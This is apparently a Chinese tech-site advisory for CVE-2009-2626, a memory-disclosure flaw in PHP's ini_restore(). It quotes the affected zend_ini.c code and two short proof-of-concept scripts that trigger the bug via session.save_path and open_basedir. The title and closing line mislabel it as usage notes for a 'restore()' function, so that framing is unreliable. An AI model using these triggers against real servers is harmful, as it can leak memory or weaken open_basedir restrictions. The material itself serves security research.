PHP函数restore()重置PHP配置环境
创始人
2024-06-15 12:03:21
0

PHP作为一种功能强大的HTML嵌入式语言受到广泛的运用,尤其适合于WEB开发中。下面我们将为大家详细介绍有关PHP函数restore()的相关用法。#t#

影响版本:
PHP PHP 5.3.0
PHP PHP 5.2.10漏洞描述:
BUGTRAQ ID: 36009
CVE ID: CVE-2009-2626

在使用PHP函数restore()重置PHP配置环境时PG()类中的变量会显示任意部分的内存。如果要利用这个漏洞,攻击者必须要通过ini_set()函数声明变量。

- ---zend_ini.c---

  1. static int zend_restore_ini_entry_cb
    (zend_ini_entry *ini_entry, int stage  
  2. TSRMLS_DC) /* {{{ */  
  3. {  
  4. if (ini_entry->modified) {  
  5. if (ini_entry->on_modify) {  
  6. zend_try {  
  7. /* even if on_modify bails out, we 
    have to continue on with restoring,  
  8. since there can be allocated variables 
    that would be freed on MM  
  9. shutdown  
  10. and would lead to memory corruption 
    later ini entry is modified again  
  11. */  
  12. ini_entry->on_modify(ini_entry, 
    ini_entry->orig_value,  
  13. ini_entry->orig_value_length, 
    ini_entry->mh_arg1, ini_entry->mh_arg2,  
  14. ini_entry->mh_arg3, stage TSRMLS_CC);  
  15. } zend_end_try();  
  16. }  
  17. if (ini_entry->value != ini_entry
    ->orig_value) {  
  18. efree(ini_entry->value);  
  19. }  
  20. ini_entry->value = ini_entry->
    orig_value;  
  21. ini_entry->value_length = 
    ini_entry->orig_value_length;  
  22. ini_entry->modified = 0;  
  23. ini_entry->orig_value = NULL;  
  24. ini_entry->orig_value_length = 0;  
  25. if (ini_entry->modifiable >= (1 << 3)) {  
  26. ini_entry->modifiable >>= 3;  
  27. }  
  28. }  
  29. return 0;  

- ---zend_ini.c---

PHP函数restore()所修改的标记会被重置。由于没有检查ini_entry->on_modify()的值,PG()会超出内存范围。

PHP函数restore()测试方法:

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

  1. < ?php  
  2. ini_set("session.save_path", 
    "0123456789ABCDEF");  
  3. ini_restore("session.save_path");  
  4. session_start();  
  5. ?> 
  1. < ?php  
  2. ini_set("open_basedir", "A");  
  3. ini_restore("open_basedir");  
  4. ini_get("open_basedir");  
  5. include("B");  
  6. ?> 

以上就是PHP函数restore()的相关使用方法。

相关内容

热门资讯

如何允许远程连接到MySQL数... [[277004]]【51CTO.com快译】默认情况下,MySQL服务器仅侦听来自localhos...
如何利用交换机和端口设置来管理... 在网络管理中,总是有些人让管理员头疼。下面我们就将介绍一下一个网管员利用交换机以及端口设置等来进行D...
施耐德电气数据中心整体解决方案... 近日,全球能效管理专家施耐德电气正式启动大型体验活动“能效中国行——2012卡车巡展”,作为该活动的...
20个非常棒的扁平设计免费资源 Apple设备的平面图标PSD免费平板UI 平板UI套件24平图标Freen平板UI套件PSD径向平...
德国电信门户网站可实时显示全球... 德国电信周三推出一个门户网站,直观地实时提供其安装在全球各地的传感器网络检测到的网络攻击状况。该网站...
为啥国人偏爱 Mybatis,... 关于 SQL 和 ORM 的争论,永远都不会终止,我也一直在思考这个问题。昨天又跟群里的小伙伴进行...
《非诚勿扰》红人闫凤娇被曝厕所... 【51CTO.com 综合消息360安全专家提醒说,“闫凤娇”、“非诚勿扰”已经被黑客盯上成为了“木...
2012年第四季度互联网状况报... [[71653]]  北京时间4月25日消息,据国外媒体报道,全球知名的云平台公司Akamai Te...